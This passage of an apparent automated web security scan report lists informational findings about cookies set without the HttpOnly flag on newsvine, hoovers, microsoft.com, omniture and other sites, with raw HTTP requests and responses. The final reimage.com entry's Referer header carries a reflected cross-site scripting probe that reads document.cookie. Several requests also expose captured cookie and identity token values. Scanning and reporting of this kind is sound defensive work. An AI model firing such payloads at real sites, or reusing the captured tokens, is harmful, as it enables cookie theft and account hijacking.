reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.459. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
BIGipServerwww-1=1341968906.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.460. http://www.hoovers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhaspriv-colo1=251384330.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.hoovers.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; BIGipServerholpriv-colo1=1342243082.20480.0000; BIGipServerwww-1=1341968906.20480.0000; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:54:56 GMT
Server: Apache
Last-Modified: Fri, 09 Oct 2009 00:43:07 GMT
ETag: "e36"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerhaspriv-colo1=251384330.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"

..............h...&... ..............(....... ...........@...........................Y*................................................................................................................
...[SNIP]...

17.461. http://www.interactivedata-rts.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivedata-rts.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

kdk23kds=m0cul2o9mqitm9hr94f71kgc03; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.interactivedata-rts.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kdk23kds=m0cul2o9mqitm9hr94f71kgc03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

17.462. http://www.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.live.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; domain=.live.com; path=/
mktstate=S=821848180&U=&E=&P=&B=en-us; domain=.live.com; path=/
mkt1=norm=en-us; domain=.live.com; path=/
mkt2=marketing=en-us; domain=.www.live.com; path=/
E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.463. http://www.microsoft.com/web/gallery/install.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/web/gallery/install.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/gallery/install.aspx HTTP/1.1
Host: www.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;

Response

17.464. http://www.morningstar.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.morningstar.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.morningstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.465. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.redacted; expires=Tue, 01-Feb-2011 23:26:28 GMT; path=/
expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.466. http://www.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.467. http://www.msnbc.redacted/id/8004316/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSID=AwBTfCkAAAAApMVETRqCDgWkxURNAQAAAAAAAAAAAAAAAACkxURNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
SSSC=108.G5567792347586920986.1.0.0; path=/; domain=.redacted
SSRT=pMVETQE; path=/; domain=.redacted; expires=Mon, 30-Jan-2012 01:57:56 GMT
MC1=GUID=6db8003adf854298adce0bc40466cda9; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/8004316/?from=en-us_msnhp HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.468. http://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.469. http://www.newsvine.com/_action/article/emailThis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/article/emailThis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.470. http://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.471. http://www.newsvine.com/_action/user/startTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/startTracking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.472. http://www.newsvine.com/_action/user/stopTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_action/user/stopTracking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.473. http://www.newsvine.com/_api/comments/getComments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/comments/getComments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/comments/getComments HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.474. http://www.newsvine.com/_api/question/getUserData previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/question/getUserData

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com
sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com
vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_api/question/getUserData HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.475. http://www.newsvine.com/_api/user/convTracker previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_api/user/convTracker

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_api/user/convTracker HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.476. http://www.newsvine.com/_nv/accounts/newsvine/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_nv/accounts/newsvine/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.477. http://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.478. http://www.newsvine.com/_tools/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_tools/user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.479. http://www.newsvine.com/_vine/js/m1/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_vine/js/m1/global.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.480. https://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.481. https://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.482. https://www.newsvine.com/_nv/accounts/global/information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.483. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.484. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.485. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.486. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.487. https://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.488. https://www.newsvine.com/_nv/api/accounts/resetPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.489. http://www.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=101320202.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 23:23:55 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11007
Date: Sun, 30 Jan 2011 02:01:00 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

17.491. http://www.reimage.com/track_new/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reimage.com
Path:	/track_new/track.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_tracking=Neudesic69f18; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
_campaign=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
_adgroup=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
_keyword=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
_ads=direct; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/
_trackid=12484382; expires=Thu, 31-Mar-2011 01:28:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_new/track.php?tracking=Neudesic69f18 HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:28:32 GMT
Server:
P3P: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
